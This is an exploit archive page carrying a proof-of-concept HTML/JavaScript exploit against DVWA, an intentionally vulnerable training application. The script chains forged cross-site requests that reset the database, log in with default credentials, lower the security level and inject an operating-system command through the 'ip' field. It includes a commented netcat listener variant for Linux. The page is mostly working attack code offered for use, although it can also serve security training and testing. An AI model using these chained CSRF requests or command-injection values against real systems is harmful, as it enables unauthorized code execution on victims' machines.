exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DVWA Cross Site Request Forgery

DVWA Cross Site Request Forgery
Posted Sep 15, 2014
Authored by Paulos Yibelo

Damn Vulnerable Web Application, which is meant to be a vulnerable web application for security testing, can be leveraged by attackers to compromise your system when in use. This is a good reminder to only use DVWA on an air-gapped network. This exploits demonstrates the ability to gain code execution on the system.

tags | exploit, web, code execution, csrf
SHA-256 | 75399c599af8214d734313a75983c0648c16b80932511c55319919111ea07883

DVWA Cross Site Request Forgery

Change Mirror Download
<!-- There are multiple CSRF issues in DVWA. Attackers can use these CSRF exploits to
first reset the DVWA database of victim, then make the victim log in using the default resets,
next crafts another CSRF to change the challenge level to low to make exploitation more probable,
then use these to craft a command execution CSRF and possibly get a shell. :)

*This PoC will open calculator as a demo execution in approximately 5 seconds.*

The attacker just needs to know you have DVWA for this to work.

Paulos Yibelo and Tabor N. Shiferaw 2014

-->

<script src='https://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js' type='text/javascript'>
</script>
<div id='loader'></div>

<Script>

//document.getElementById("loader").innerHTML = 'Loading...';

var one = {"create_db":'whatever'};
var two = {"username":"admin","password":"password","Login":"Login"};
var three = {"security":"low","seclev_submit":"Submit"};

//windows opens calculator; change this to whatever your desire
var four = {"ip":"127.0.0.1 && notepad && calc","submit":"submit"};

//linux
//var four = {"ip":"127.0.0.1;netcat -l 15.11.11.x -p 4444","submit":"submit"};

/*
*step 1
*Reset the Databse
*/
function start_exploit()
{
$("#loader").html("Loading...");
$.ajax({
url:"http://localhost/dvwa/setup.php",
type:"POST",
data:one,
success:
function(x){
dvwaLogin();
}

});
}
/*
*step 2
*login using default new password
*/
function dvwaLogin()
{
$.ajax({
url:"http://localhost/dvwa/login.php",
type:"POST",
data:two,
success:function(x){
levelChanger();
}
});
}
/*
*step 3
*set level to low
*/
function levelChanger(){
$.ajax({
url:"http://localhost/dvwa/security.php",
type:"POST",
data:three,
success:function(x){
commandExecution();
}
});
}

/*
*step 4
*execute command
*/
function commandExecution(){
$.ajax(
{
url:"http://localhost/dvwa/vulnerabilities/exec/index.php",
type:"POST",
data:four,
success:function(x){
//document.getElementById("loader").innerHTML = "Executed";
$("#loader").text("Loaded");
}
}
);
}


start_exploit();
</script>

<!-- check out http://paulosyibelo.blogspot.com/2014/09/dvwa-unintended-security-issues.html for more -->

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close